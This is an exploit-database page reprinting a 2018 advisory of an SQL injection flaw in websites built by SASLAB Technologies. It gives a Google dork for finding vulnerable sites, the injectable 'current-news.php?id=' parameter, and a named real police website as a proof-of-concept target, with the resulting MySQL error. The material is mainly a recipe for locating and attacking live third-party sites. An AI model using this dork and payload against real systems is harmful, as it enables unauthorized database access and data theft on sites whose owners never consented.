Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-89 | Unknown | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Ankur Biswas | High | Remote | 2018-09-06 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H | 0.00113296 | 0.03947 |
################################################################################################# # Exploit Title : Website Maintained By Ankur Biswas SASLAB Technologies Pvt Ltd SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/09/2018 # Vendor Homepage : saslab.in ~ in.linkedin.com/in/ankur2u ~ indiamart.com/saslab-technologies # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Website Maintained By : Ankur Biswas ( SASLAB Technologies Pvt Ltd )'' # Exploit : /PATH/current-news.php?id=[SQL Injection] ################################################################################################# # Example Site => n24pgspolice.in/home/current-news.php?id=1%27 => [ Proof of Concept ] => archive.is/n4xpY # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.